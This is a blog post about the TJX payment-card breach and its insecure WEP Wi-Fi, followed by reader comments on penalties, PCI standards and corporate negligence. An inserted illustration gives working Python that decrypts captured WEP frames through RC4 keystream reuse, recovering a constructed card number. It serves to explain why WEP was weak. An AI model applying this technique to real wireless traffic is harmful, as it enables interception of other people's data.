Remember How TJX Was The Worst Data Breach In History? Well, It Was Actually Worse

from the stunning-incompetence dept

In the last few years, every time a massive data breach is reported, you can be assured of one thing: a few weeks after the initial report, a second report will come out admitting that the breach was worse than previously thought. We saw it with ChoicePoint. We saw it with the VA. It seems to happen every time. With the now infamous TJX breach, we'd already noted that the problems were worse than originally announced, making it the largest such breach ever reported.

That wasn't surprising once you learned just how incompetent the company had been: it failed to comply with nearly all of the card companies' security guidelines and left its entire system open to anyone who could break into a WEP WiFi network. That is not a high bar. WEP is cryptographically broken rather than merely misconfigured: every frame is encrypted with the same static RC4 key, differing only by a 24-bit per-frame IV sent in the clear, so an attacker passively capturing traffic can recover the key with freely available tools. Unlike the data from many other widely announced breaches, the TJX data has already been used in numerous frauds, costing upwards of $60 million.

With such astounding incompetence and a breach this large, should it come as any surprise that even the updated breach numbers weren't complete? That's right: thanks to documents being filed in the lawsuits against TJX, it's now coming out that the breach has affected even more people than was earlier announced. Of course, the question still remains whether or not the punishment the company receives will matter. Nothing much seems to be done to stop companies from being so careless, and there's no indication that's going to change in this case either.
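To make concrete why "hacking a simple insecure WEP WiFi system" is easy, here is an added illustration that is not part of the Techdirt post and not TJX's code. It implements WEP's per-frame RC4 encryption, then plays the passive attacker: watch for two captured frames that share a 24-bit IV, XOR their ciphertexts to cancel the shared keystream, and read one frame using known plaintext from the other. The WEP key, IVs and frame contents are constructed for the demo; the attacker never learns the key. The fixed LLC/SNAP header used as a crib really does begin every WEP data frame, and the birthday-bound helper shows why IV repeats show up after only a few thousand frames.

```python
"""Added example: keystream reuse in WEP (RC4 with a 24-bit IV prepended to a static key)."""
from __future__ import annotations

import math
from collections import defaultdict

# Every WEP-encrypted IPv4 data frame starts with this 802.2 LLC/SNAP header,
# so an attacker can assume these 8 plaintext bytes without seeing anything decrypted.
LLC_SNAP_IPV4 = bytes.fromhex("aaaa030000000800")


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) plus output generation (PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> tuple[bytes, bytes]:
    """WEP frame body: (cleartext IV, RC4(IV || key) XOR plaintext).
    The CRC-32 ICV is omitted; it does not change the keystream-reuse weakness shown here."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    return iv, xor_bytes(plaintext, rc4_keystream(iv + wep_key, len(plaintext)))


def find_iv_collisions(captured: list[tuple[bytes, bytes]]) -> dict[bytes, list[bytes]]:
    """Group passively captured (iv, ciphertext) pairs by IV; return only IVs seen more than once."""
    by_iv: dict[bytes, list[bytes]] = defaultdict(list)
    for iv, ct in captured:
        by_iv[iv].append(ct)
    return {iv: cts for iv, cts in by_iv.items() if len(cts) > 1}


def decrypt_with_reused_keystream(ct_known: bytes, known_plaintext: bytes, ct_target: bytes) -> bytes:
    """Two frames share an IV, and the attacker knows (a prefix of) the first frame's plaintext.
    ct_known XOR known_plaintext yields the keystream, which decrypts as many bytes of the
    target frame as there are known plaintext bytes. No key material is needed."""
    keystream = xor_bytes(ct_known, known_plaintext)
    return xor_bytes(ct_target, keystream)


def frames_until_iv_repeat(p: float = 0.5, iv_bits: int = 24) -> int:
    """Birthday bound: frames with uniformly random IVs needed for probability p of a repeat."""
    n = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * n * math.log(1 / (1 - p))))


def demo() -> dict:
    """Simulate a sniffer on a WEP network whose IVs have repeated (constructed data throughout)."""
    wep_key = bytes.fromhex("0123456789abcdef0123456789")  # constructed 104-bit key, unknown to the attacker
    repeated_iv = bytes.fromhex("3a7f01")                  # constructed IV that the sender reused
    frame_a = LLC_SNAP_IPV4 + b"GET /login HTTP/1.0\r\n"   # constructed plaintexts
    frame_b = LLC_SNAP_IPV4 + b"card=4111111111111111&cvv=123"
    captured = [
        wep_encrypt(wep_key, bytes.fromhex("000001"), b"unrelated frame"),
        wep_encrypt(wep_key, repeated_iv, frame_a),
        wep_encrypt(wep_key, bytes.fromhex("000002"), b"another unrelated frame"),
        wep_encrypt(wep_key, repeated_iv, frame_b),
    ]
    collisions = find_iv_collisions(captured)
    ct_a, ct_b = collisions[repeated_iv]
    # Knowing only the fixed LLC/SNAP crib recovers the first 8 bytes of frame B.
    prefix = decrypt_with_reused_keystream(ct_a, LLC_SNAP_IPV4, ct_b)
    # Knowing all of frame A (e.g. traffic the attacker provoked) recovers len(frame_a) bytes of B.
    recovered = decrypt_with_reused_keystream(ct_a, frame_a, ct_b)
    return {"colliding_ivs": len(collisions), "prefix": prefix, "recovered": recovered}


if __name__ == "__main__":
    result = demo()
    print("IVs reused:", result["colliding_ivs"])
    print("Recovered from crib only:", result["prefix"])
    print("Recovered with full known frame:", result["recovered"])
    print("Frames until a 50% chance of an IV repeat:", frames_until_iv_repeat())
```

The example deliberately stops at keystream reuse, which needs nothing but captured traffic and a known header. The key-recovery attacks that tools of the era automated go further, exploiting RC4's weak-key behaviour across many IVs, but the point for this story is the same: a static key plus a 24-bit IV means passive listening is enough.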


Reader Comments

  1. GrammarMan, Oct 29th, 2007 @ 6:51pm

    Quick... first sentence, change "the breach was worse that" to "the breach was worse than" and then delete my comment! :p

  2. Mike (profile), Oct 29th, 2007 @ 7:33pm

    Re:

    Quick... first sentence, change "the breach was worse that" to "the breach was worse than" and then delete my comment! :p

    Heh. No reason to delete... thanks for pointing out the mistake. It's now been fixed.

  3. Anonymous Coward, Oct 29th, 2007 @ 8:32pm

    "Of course, the question still remains whether or not the punishment the company receives will matter. It doesn't seem like anything is really done to stop companies from being so careless, and there's no indication that's going to change in this case either."

    What the !@#$ are you talking about?

    Have you ever heard of the new Payment Card Industry (PCI) standards Visa/Mastercard et al. are enforcing? They're pretty much forcing anyone who processes credit cards to adhere to a certain set of security standards or you pay big $$ fines.

  4. Anonymous Coward, Oct 29th, 2007 @ 10:11pm

    Re:

    Really? Fines upwards of US$60M, then, to keep it in scale with the losses suffered by consumers affected by the negligence of TJX?

    Hm, I didn't see fines like that discussed in the PCI standards...

  5. Shamalama, Oct 29th, 2007 @ 11:09pm

    consequences and repercussions

    Losing the ability to process payment cards, or at least the major two, can cause a pretty significant financial hit to most of these companies. Although I doubt people are quick to pull out the charge card at TJX these days anyway. I say pull their ability to do in house processing and give the process to a competent vendor or even an arm of the CC companies themselves and make offenders pay ridiculous fees. Hmm... unless they start passing that on to the consumer as a "convenience fee". OK: Cash only, then probation with vendor, then triple factor authentication at the point of sale with terminal on regularly audited secure/compliant network. Eh screw that. Just implant the zero liability paypass chip in my *&%$@! and let the CC comps pay the fees (with my ridiculous interest) should some bastard scan my *&$@#!. This is why I want to see a presidential candidate come out on a ticket to change the national currency to women and beer. Not only could we then get beer from the bank but we wouldn't have to carry around a wallet because... crap. I should go to sleep.

  6. Michael E, Oct 30th, 2007 @ 3:28am

    Consequences

    I don't know how much TJX will actually get fined based on the scope of the breach to end consumers. With what I've been reading on the matter, TJX will throw out coupons and the like to consumers affected by the breach. This is kind of amusing to me as they have also claimed that they could not have notified the end consumer since they don't have that information... So how are they going to send out those coupons then?

    From the corp perspective, damages imposed by the courts will also depend on the litigating parties. There has been evidence displayed that TJX's security was weak and nothing substantive was done to curb the faults then, either by PCI or other member organizations. So the depth of the scope can be limited to when the PCI 1.0 standard was ratified and when TJX filed a Report of Compliance that stated they were compliant (which I fail to see given their status). If they did file and they are found to have falsified their filing, then the hammer can really be dropped on them.

    The really big issue here isn't really the security but governance. There has been evidence of IT insiders within TJX crying 'wolf' only to have management fail to undertake the necessary risk assessments to fully quantify the risks involved. There are no laws against poor management but there is recourse in the form of market confidence. If anything will hurt TJX it will come from the folks that hold their stock. If they started to dump their stock then the company management will also take a severe beating as it is likely that they also have some skin tied up in the company's valuation.

    My 0.02c.

  7. MrWizard, Oct 30th, 2007 @ 3:49am

    Re:

    You've got to be kidding.
    They can't/won't enforce their existing standards.
    What makes you think they'll enforce their "new" standards?

    And the Visa/MC penalties? What a joke.
    After the largest data breach ever, was TJX banned from Visa/MC?
    Nope.

  8. Jeremy, Oct 30th, 2007 @ 4:27am

    Umm...

    "...wide open to anyone who could hack a simple insecure WEP WiFi system..."

    Does that mean we have WEP WiFi with self-esteem issues? Or perhaps that it should be UNsecure?

  9. Chronno S. Trigger, Oct 30th, 2007 @ 6:01am

    Re: Umm...

    Insecure, adj., Lacking in security or safety; "his fortune was increasingly insecure"; "an insecure future".

    Sad to say, I probably have a more secure network at home.

  10. Chris, Oct 30th, 2007 @ 6:13am

    Re: Re:

    After the largest data breach ever, was TJX banned from Visa/MC?
    Nope.

    No, Visa/MC just ban companies that follow the law of their country that the RIAA doesn't like. I.e., allofmp3.com....

  11. Anonymous Coward, Oct 30th, 2007 @ 7:04am

    Re: Re: Re:

    Somehow I knew it was the RIAA's fault.

  12. Anonymous Coward, Oct 30th, 2007 @ 7:25am

    Big deal...

    Forget the fines, forget being banned from Visa/Master; the only thing that will happen is that a few peons (MAYBE a manager) will get fired and have a gag order put on them (so they can't tell what really happened), some free credit monitoring and some discount coupons will be given to customers, and then the upper management and shareholders will continue to rake in several million a year.

  13. freak3dot, Oct 30th, 2007 @ 9:10am

    TJX Message

    Has anyone read the letter from the President and CEO of TJX? Good for a laugh if nothing else.
    http://www.tjx.com/tjx_message.html

    freak3dot

  14.

    Who committed the biggest crime?

    Let's not forget that someone else "Stole" that information from TJX. I have not seen one post putting the blame on the hacker.

  15. Jeremy, Oct 31st, 2007 @ 4:03am

    I stand corrected.

